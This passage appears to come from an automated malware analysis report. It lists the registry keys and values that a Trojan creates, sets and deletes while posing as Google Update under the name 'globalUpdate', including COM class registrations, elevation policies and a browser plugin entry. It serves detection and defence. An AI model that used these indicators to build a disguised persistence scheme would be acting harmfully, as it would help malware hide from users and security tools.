[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe]
"DisableExceptionChainValidation" = "0"

[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"brand" = "GGLS"

[HKCR\CLSID\{5645E0E7-FC12-43BF-A6E4-F9751942B298}]
"(Default)" = "globalUpdate Update Plugin"

[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{430FD4D0-B729-4F61-AA34-91526481799D}]
"pv" = "1.3.25.0"

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"vendor" = "globalUpdate"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "90 B0 12 A2 1C 69 EA 46 A3 B4 59 A1 27 AA 3F EE"

[HKCR\globalUpdate.OneClickCtrl.10\CLSID]
"(Default)" = "{5645E0E7-FC12-43BF-A6E4-F9751942B298}"

[HKLM\SOFTWARE\GlobalUpdate\Update]
"Path" = "%Program Files%\globalUpdate\Update\GoogleUpdate.exe"
"Version" = "1.3.25.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"Path" = "%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}]
"AppPath" = "%Program Files%\globalUpdate\Update\1.3.25.0"

[HKCR\MIME\Database\Content Type\application/x-vnd.google.oneclickctrl.10]
"CLSID" = "{5645E0E7-FC12-43BF-A6E4-F9751942B298}"

[HKCR\CLSID\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5645E0E7-FC12-43BF-A6E4-F9751942B298}]
"AppPath" = "%Program Files%\globalUpdate\Update"

[HKCR\CLSID\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}\ProgID]
"(Default)" = "globalUpdate.Update3WebControl.4"

[HKCR\CLSID\{5645E0E7-FC12-43BF-A6E4-F9751942B298}\InprocServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll"
"ThreadingModel" = "Apartment"

[HKCR\globalUpdate.OneClickCtrl.10]
"(Default)" = "globalUpdate Update Plugin"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\GlobalUpdate\Update]
"mi"
"eulaaccepted"

[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"c"

[HKLM\SOFTWARE\GlobalUpdate\Update]
"LastChecked"

[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"UpdateAvailableSince"

[HKLM\SOFTWARE\GlobalUpdate\Update]
"ui"
"uid"

[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"UpdateAvailableCount"

[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"

The process GoogleUpdate.exe:2504 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCR\CLSID\{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}]
"(Default)" = "CoCreateAsync"

[HKCR\Interface\{224FE662-1E6D-4BC0-AEBB-9E2FB4057BE9}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}\ProgID]
"(Default)" = "globalUpdateUpdate.Update3WebMachine.1.0"

[HKCR\Interface\{07F41522-AF7D-4F26-B394-094F059FDB8A}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\Interface\{0522D9A4-4D57-437D-978D-E5B3B6C9005D}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\Interface\{823AE2EB-E62C-4847-B192-C99B91B92416}]
"(Default)" = "IApp"

[HKCR\Interface\{3CC60715-D6C5-429D-830E-43FA3F86C61D}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\Elevation]
"Enabled" = "1"

[HKCR\Interface\{A6D54287-7939-466A-8579-92546D946C8C}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\Interface\{ED0B64D4-BF27-4521-AD27-190F49BF5EA7}]
"(Default)" = "IJobObserver"

[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}\Elevation]
"IconReference" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-1004"

[HKCR\globalUpdateUpdate.CoCreateAsync.1.0]
"(Default)" = "CoCreateAsync"

[HKCR\globalUpdateUpdate.Update3WebMachineFallback\CurVer]
"(Default)" = "globalUpdateUpdate.Update3WebMachineFallback.1.0"

[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}\Elevation]
"Enabled" = "1"

[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}]
"(Default)" = "Google Update Broker Class Factory"

[HKCR\Interface\{9B4F7CFE-987D-410E-A8E4-20182E0B3C24}]
"(Default)" = "IGoogleUpdate3Web"

[HKCR\Interface\{9B9A45F4-18FC-484A-BACA-076D78273D8E}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\Interface\{59D188FA-757A-424E-8C93-F58FFD896BD7}]
"(Default)" = "ICredentialDialog"

[HKCR\CLSID\{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe"

[HKCR\globalUpdateUpdate.Update3WebMachine\CLSID]
"(Default)" = "{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}"

[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}\Elevation]
"Enabled" = "1"

[HKCR\Interface\{ED0B64D4-BF27-4521-AD27-190F49BF5EA7}\NumMethods]
"(Default)" = "13"

[HKCR\globalUpdateUpdate.CredentialDialogMachine\CLSID]
"(Default)" = "{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}"

[HKCR\CLSID\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}\ProgID]
"(Default)" = "globalUpdate.OneClickProcessLauncherMachine.1.0"

[HKCR\globalUpdateUpdate.Update3WebMachine.1.0\CLSID]
"(Default)" = "{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}"

[HKCR\Interface\{823AE2EB-E62C-4847-B192-C99B91B92416}\NumMethods]
"(Default)" = "40"

[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}]
"(Default)" = "Google Update Broker Class Factory"

[HKCR\Interface\{A78EDAFB-926F-4D93-AB13-8232D7378EB1}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\globalUpdateUpdate.Update3WebMachine.1.0]
"(Default)" = "Google Update Broker Class Factory"

[HKCR\Interface\{555D7146-94A8-4C94-AE76-C39CDC7F7705}]
"(Default)" = "ICoCreateAsyncStatus"

[HKCR\Interface\{9B9A45F4-18FC-484A-BACA-076D78273D8E}\NumMethods]
"(Default)" = "4"

[HKCR\Interface\{DD1F043F-ABC8-4643-8B95-D2C5B22BB019}]
"(Default)" = "IProcessLauncher"

[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe"

[HKCR\globalUpdateUpdate.CoreMachineClass]
"(Default)" = "Google Update Core Class"

[HKCR\Interface\{023E9EC8-B147-40EB-B0B3-DF90618FB371}\NumMethods]
"(Default)" = "24"

[HKCR\Interface\{ED0B64D4-BF27-4521-AD27-190F49BF5EA7}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}\Elevation]
"IconReference" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-1004"

[HKCR\Interface\{59D188FA-757A-424E-8C93-F58FFD896BD7}\NumMethods]
"(Default)" = "4"

[HKCR\CLSID\{E0ADB535-D7B5-4D8B-B15D-578BDD20D76A}\InprocServer32]
"ThreadingModel" = "Both"

[HKCR\CLSID\{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe"

[HKCR\Interface\{3CC60715-D6C5-429D-830E-43FA3F86C61D}\NumMethods]
"(Default)" = "9"

[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}\ProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachine.1.0"

[HKCR\globalUpdateUpdate.ProcessLauncher\CLSID]
"(Default)" = "{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}]
"Policy" = "3"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachine.1.0]
"(Default)" = "Google Update Broker Class Factory"

[HKCR\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}\InprocHandler32]
"ThreadingModel" = "Both"

[HKCR\CLSID\{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}]
"(Default)" = "GoogleUpdate CredentialDialog"

[HKCR\Interface\{3A807417-B46D-4D37-8C9A-19AC6DE204F9}\NumMethods]
"(Default)" = "4"

[HKCR\globalUpdateUpdate.ProcessLauncher]
"(Default)" = "Google Update Process Launcher Class"

[HKCR\Interface\{0522D9A4-4D57-437D-978D-E5B3B6C9005D}\NumMethods]
"(Default)" = "10"

[HKCR\globalUpdate.OneClickProcessLauncherMachine.1.0\CLSID]
"(Default)" = "{5E89ACE9-E16B-499A-87B4-0DBF742404C1}"

[HKCR\Interface\{023E9EC8-B147-40EB-B0B3-DF90618FB371}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}\Elevation]
"IconReference" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-1004"

[HKCR\Interface\{E3F3E8F9-F747-4DD6-BA6B-82A6CE1E0860}]
"(Default)" = "IRegistrationUpdateHook"

[HKCR\globalUpdateUpdate.CoreMachineClass\CLSID]
"(Default)" = "{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}"

[HKCR\Interface\{A78EDAFB-926F-4D93-AB13-8232D7378EB1}\NumMethods]
"(Default)" = "10"

[HKCR\Interface\{A8F7D0A5-7074-40B8-9BDC-1174BDD0A132}]
"(Default)" = "IGoogleUpdate3WebSecurity"

[HKCR\Interface\{9B9A45F4-18FC-484A-BACA-076D78273D8E}]
"(Default)" = "IGoogleUpdateCore"

[HKCR\globalUpdateUpdate.ProcessLauncher.1.0]
"(Default)" = "Google Update Process Launcher Class"

[HKCR\Interface\{224FE662-1E6D-4BC0-AEBB-9E2FB4057BE9}\NumMethods]
"(Default)" = "4"

[HKCR\globalUpdateUpdate.CoCreateAsync\CurVer]
"(Default)" = "globalUpdateUpdate.CoCreateAsync.1.0"

[HKCR\Interface\{212E6D43-6062-492A-B8CC-144669FF11ED}\NumMethods]
"(Default)" = "10"

[HKCR\Interface\{8120D9D6-785C-4413-9C0C-DF2028C56FAD}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\Interface\{0522D9A4-4D57-437D-978D-E5B3B6C9005D}]
"(Default)" = "IAppVersionWeb"

[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}]
"LocalizedString" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-3000"

[HKCR\Interface\{555D7146-94A8-4C94-AE76-C39CDC7F7705}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\globalUpdate.OneClickProcessLauncherMachine]
"(Default)" = "globalUpdate.OneClickProcessLauncher"

[HKCR\Interface\{07F41522-AF7D-4F26-B394-094F059FDB8A}\NumMethods]
"(Default)" = "24"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachine]
"(Default)" = "Google Update Broker Class Factory"

[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}]
"LocalizedString" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-3000"

[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}]
"LocalizedString" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-3000"

[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "23 53 0E 28 8B EF 63 55 A2 B2 5B 42 A2 82 EE 78"

[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.Update3WebMachine"

[HKCR\Interface\{A78EDAFB-926F-4D93-AB13-8232D7378EB1}]
"(Default)" = "IGoogleUpdate3"

[HKCR\CLSID\{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}\ProgID]
"(Default)" = "globalUpdateUpdate.CredentialDialogMachine.1.0"

[HKCR\CLSID\{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}\InProcServer32]
"ThreadingModel" = "Both"

[HKCR\Interface\{DD1F043F-ABC8-4643-8B95-D2C5B22BB019}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}\ProgID]
"(Default)" = "globalUpdateUpdate.Update3WebMachineFallback.1.0"

[HKCR\globalUpdateUpdate.CredentialDialogMachine\CurVer]
"(Default)" = "globalUpdateUpdate.CredentialDialogMachine.1.0"

[HKCR\globalUpdateUpdate.Update3WebMachineFallback.1.0\CLSID]
"(Default)" = "{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}"

[HKCR\globalUpdate.OneClickProcessLauncherMachine\CurVer]
"(Default)" = "globalUpdate.OneClickProcessLauncherMachine.1.0"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachineFallback\CLSID]
"(Default)" = "{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}"

[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachine"

[HKCR\Interface\{0C40F472-7407-4467-8914-1DEA7C326972}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\Interface\{D14D64BC-A0E4-42E3-BB72-FB41EA43C198}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachine\CurVer]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachine.1.0"

[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}\Elevation]
"Enabled" = "1"

[HKCR\Interface\{9B4F7CFE-987D-410E-A8E4-20182E0B3C24}\NumMethods]
"(Default)" = "8"

[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.CoreMachineClass"

[HKCR\globalUpdateUpdate.CoreMachineClass\CurVer]
"(Default)" = "globalUpdateUpdate.CoreMachineClass.1"

[HKCR\CLSID\{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.CredentialDialogMachine"

[HKCR\CLSID\{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}\ProgID]
"(Default)" = "globalUpdateUpdate.CoCreateAsync.1.0"

[HKCR\CLSID\{E0ADB535-D7B5-4D8B-B15D-578BDD20D76A}\InprocServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\psmachine.dll"

[HKCR\Interface\{E3F3E8F9-F747-4DD6-BA6B-82A6CE1E0860}\NumMethods]
"(Default)" = "8"

[HKCR\CLSID\{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}\InProcServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\psmachine.dll"

[HKCR\Interface\{023E9EC8-B147-40EB-B0B3-DF90618FB371}]
"(Default)" = "ICurrentState"

[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}\ProgID]
"(Default)" = "globalUpdateUpdate.CoreMachineClass.1"

[HKCR\globalUpdateUpdate.ProcessLauncher.1.0\CLSID]
"(Default)" = "{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}"

[HKCR\Interface\{212E6D43-6062-492A-B8CC-144669FF11ED}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.Update3WebMachineFallback"

[HKCR\Interface\{0C40F472-7407-4467-8914-1DEA7C326972}\NumMethods]
"(Default)" = "14"

[HKCR\CLSID\{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.CoCreateAsync"

[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\ProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachineFallback.1.0"

[HKCR\CLSID\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachine\CLSID]
"(Default)" = "{ADBC39BE-3D20-4333-8D99-E91EB1B62474}"

[HKCR\globalUpdateUpdate.Update3WebMachineFallback]
"(Default)" = "GoogleUpdate Update3Web"

[HKCR\globalUpdateUpdate.Update3WebMachine]
"(Default)" = "Google Update Broker Class Factory"

[HKCR\globalUpdateUpdate.Update3WebMachineFallback.1.0]
"(Default)" = "GoogleUpdate Update3Web"

[HKCR\CLSID\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}]
"(Default)" = "globalUpdate.OneClickProcessLauncher"

[HKCR\globalUpdate.OneClickProcessLauncherMachine\CLSID]
"(Default)" = "{5E89ACE9-E16B-499A-87B4-0DBF742404C1}"

[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachineFallback"

[HKCR\Interface\{59D188FA-757A-424E-8C93-F58FFD896BD7}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\Interface\{A6D54287-7939-466A-8579-92546D946C8C}]
"(Default)" = "IOneClickProcessLauncher"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachineFallback\CurVer]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachineFallback.1.0"

[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\Elevation]
"IconReference" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-1004"

[HKCR\globalUpdateUpdate.CredentialDialogMachine]
"(Default)" = "GoogleUpdate CredentialDialog"

[HKCR\Interface\{9B4F7CFE-987D-410E-A8E4-20182E0B3C24}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\globalUpdateUpdate.CoreMachineClass.1\CLSID]
"(Default)" = "{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}"

[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}\Elevation]
"Enabled" = "1"

[HKCR\Interface\{A8F7D0A5-7074-40B8-9BDC-1174BDD0A132}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}]
"CLSID" = "{5E89ACE9-E16B-499A-87B4-0DBF742404C1}"

[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}]
"(Default)" = "Google Update Core Class"

[HKCR\Interface\{224FE662-1E6D-4BC0-AEBB-9E2FB4057BE9}]
"(Default)" = "ICoCreateAsync"

[HKCR\globalUpdate.OneClickProcessLauncherMachine.1.0]
"(Default)" = "globalUpdate.OneClickProcessLauncher"

[HKCR\CLSID\{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}]
"(Default)" = "PSFactoryBuffer"

[HKCR\Interface\{D14D64BC-A0E4-42E3-BB72-FB41EA43C198}]
"(Default)" = "IPackage"

[HKCR\Interface\{8120D9D6-785C-4413-9C0C-DF2028C56FAD}\NumMethods]
"(Default)" = "5"

[HKCR\CLSID\{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.ProcessLauncher"

[HKCR\globalUpdateUpdate.ProcessLauncher\CurVer]
"(Default)" = "globalUpdateUpdate.ProcessLauncher.1.0"

[HKCR\Interface\{0C40F472-7407-4467-8914-1DEA7C326972}]
"(Default)" = "IAppWeb"

[HKCR\globalUpdateUpdate.CoCreateAsync]
"(Default)" = "CoCreateAsync"

[HKCR\Interface\{555D7146-94A8-4C94-AE76-C39CDC7F7705}\NumMethods]
"(Default)" = "10"

[HKCR\CLSID\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}\VersionIndependentProgID]
"(Default)" = "globalUpdate.OneClickProcessLauncherMachine"

[HKCR\CLSID\{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}\ProgID]
"(Default)" = "globalUpdateUpdate.ProcessLauncher.1.0"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachineFallback.1.0\CLSID]
"(Default)" = "{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}"

[HKCR\Interface\{3A807417-B46D-4D37-8C9A-19AC6DE204F9}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}]
"(Default)" = "GoogleUpdate Update3Web"

[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe"

[HKCR\Interface\{A6D54287-7939-466A-8579-92546D946C8C}\NumMethods]
"(Default)" = "4"

[HKCR\globalUpdateUpdate.CoreMachineClass.1]
"(Default)" = "Google Update Core Class"

[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}]
"LocalizedString" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-3000"

[HKCR\globalUpdateUpdate.CoCreateAsync.1.0\CLSID]
"(Default)" = "{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}"

[HKCR\CLSID\{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}]
"(Default)" = "Google Update Process Launcher Class"

[HKCR\Interface\{A8F7D0A5-7074-40B8-9BDC-1174BDD0A132}\NumMethods]
"(Default)" = "4"

[HKCR\Interface\{4517D94C-19BA-46FA-BE66-2A30CEAC4A85}]
"(Default)" = "IAppBundle"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachineFallback.1.0]
"(Default)" = "Google Update Legacy On Demand"

[HKCR\Interface\{DD1F043F-ABC8-4643-8B95-D2C5B22BB019}\NumMethods]
"(Default)" = "6"

[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachine.1.0\CLSID]
"(Default)" = "{ADBC39BE-3D20-4333-8D99-E91EB1B62474}"

[HKCR\globalUpdateUpdate.Update3WebMachine\CurVer]
"(Default)" = "globalUpdateUpdate.Update3WebMachine.1.0"

[HKCR\CLSID\{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe"

[HKCR\Interface\{E3F3E8F9-F747-4DD6-BA6B-82A6CE1E0860}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\Interface\{D14D64BC-A0E4-42E3-BB72-FB41EA43C198}\NumMethods]
"(Default)" = "10"

[HKCR\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}\InprocHandler32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\psmachine.dll"

[HKCR\globalUpdateUpdate.CredentialDialogMachine.1.0]
"(Default)" = "GoogleUpdate CredentialDialog"

[HKCR\Interface\{4517D94C-19BA-46FA-BE66-2A30CEAC4A85}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}\Elevation]
"IconReference" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-1004"

[HKCR\Interface\{4517D94C-19BA-46FA-BE66-2A30CEAC4A85}\NumMethods]
"(Default)" = "39"

[HKCR\Interface\{07F41522-AF7D-4F26-B394-094F059FDB8A}]
"(Default)" = "IAppBundleWeb"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachineFallback]
"(Default)" = "Google Update Legacy On Demand"

[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}]
"(Default)" = "Google Update Legacy On Demand"

[HKCR\Interface\{823AE2EB-E62C-4847-B192-C99B91B92416}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\globalUpdateUpdate.CoCreateAsync\CLSID]
"(Default)" = "{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}"

[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}]
"LocalizedString" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-3000"

[HKCR\Interface\{212E6D43-6062-492A-B8CC-144669FF11ED}]
"(Default)" = "IAppVersion"

[HKCR\Interface\{3CC60715-D6C5-429D-830E-43FA3F86C61D}]
"(Default)" = "IProgressWndEvents"

[HKCR\Interface\{3A807417-B46D-4D37-8C9A-19AC6DE204F9}]
"(Default)" = "IBrowserHttpRequest2"

[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe"

[HKCR\globalUpdateUpdate.Update3WebMachineFallback\CLSID]
"(Default)" = "{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}"

[HKCR\Interface\{8120D9D6-785C-4413-9C0C-DF2028C56FAD}]
"(Default)" = "IGoogleUpdate"

[HKCR\globalUpdateUpdate.CredentialDialogMachine.1.0\CLSID]
"(Default)" = "{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}"

The Trojan deletes the following registry key(s):

[HKCR\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}]
[HKCR\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}\InprocHandler32]
[HKCR\CLSID\{E0ADB535-D7B5-4D8B-B15D-578BDD20D76A}\InprocServer32]
[HKCR\CLSID\{E0ADB535-D7B5-4D8B-B15D-578BDD20D76A}]

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
"c"

The process a4f7d362-83b9-4acf-812c-4634a66ba943-4.exe:2092 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "97 60 99 36 45 94 FD B0 74 2D DA A9 B8 0B 3F DD"

[HKLM\SOFTWARE\Tempo]
"(Default)" = "tempo"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Tempo]

